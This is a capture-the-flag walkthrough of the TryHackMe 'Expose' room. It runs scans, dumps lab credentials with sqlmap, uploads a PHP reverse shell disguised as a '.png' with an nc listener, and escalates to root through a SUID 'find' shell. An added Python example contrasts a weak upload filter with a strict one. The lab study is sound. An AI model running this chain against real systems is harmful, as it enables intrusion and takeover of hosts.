Expose
Last updated
Room Link: https://tryhackme.com/room/expose
Kali
nmap -A $VICTIM
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
Kali
gobuster dir -u http://$VICTIM:1337 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Kali
sqlmap -r request.txt --dbms=mysql --dump
+----+-----------------+---------------------+--------------------------------------+
| id | email           | created             | password                             |
+----+-----------------+---------------------+--------------------------------------+
| 1  | hacker@root.thm | 2023-02-21 09:05:46 | VeryDifficultPassword!!#@#@!#!@#1231 |
+----+-----------------+---------------------+--------------------------------------+
There are two URLs here; the second one needs a username we don't have, so we'll start with the first one.
+----+------------------------------+-----------------------------------------------------+
| id | url | password |
+----+------------------------------+-----------------------------------------------------+
| 1 | /file1010111/index.php | 69c66901194a6486176e81f5945b8929 (easytohack) |
| 3 | /upload-cv00101011/index.php | // ONLY ACCESSIBLE THROUGH USERNAME STARTING WITH Z |
+----+------------------------------+-----------------------------------------------------+
Browser - /file1010111/index.php
Username: hacker@root.thm
Password: VeryDifficultPassword!!#@#@!#!@#1231
Browser
Password: easytohack
Browser - /upload-cv00101011/index.php
Password: zeamkish
Kali
git clone https://github.com/pentestmonkey/php-reverse-shell.git
cd php-reverse-shell/
# set $ip and $port inside php-reverse-shell.php to the Kali listener below before uploading
cp php-reverse-shell.php php-reverse-shell.php#.png
nc -lvnp 1337
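The `.php#.png` rename above gets past an upload check that only looks at how the filename ends. As an added example (not the room's or the author's code), here is that suffix-only check next to a strict version that rejects anything but a single clean extension and also matches the extension against the file's magic bytes; the extension allowlist, the magic-byte table and the sample filenames are assumptions of this example.

```python
import os
import re

# Assumed allowlist for a CV upload form (example values, not from the room).
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "pdf"}
# First bytes of the allowed formats, used to confirm the content matches the extension.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"%PDF-": "pdf",
}
# Exactly one stem of safe characters, one dot, one short extension: no '#', no second '.'.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$")


def weak_check(filename: str) -> bool:
    """Suffix-only check: accepts 'shell.php#.png' because it ends in .png."""
    return filename.lower().endswith((".png", ".jpg", ".jpeg"))


def strict_check(filename: str, head: bytes) -> bool:
    """Allowlist the name shape and extension, then verify the bytes agree with it."""
    name = os.path.basename(filename)
    if name != filename:           # any path component means tampering, reject
        return False
    m = SAFE_NAME.fullmatch(name)
    if m is None:                  # '#', extra dots or odd characters never get this far
        return False
    ext = m.group(1).lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    if ext == "jpeg":
        ext = "jpg"
    detected = next((kind for magic, kind in MAGIC.items() if head.startswith(magic)), None)
    return detected == ext         # a PHP payload named .png fails here even if renamed cleanly
```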
Upgrade to a full TTY (tab completion)
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Kali
ssh zeamkish@$VICTIM
Password: easytohack@123
Victim
find / -perm -4000 2>/dev/null
find . -exec /bin/sh -p \; -quit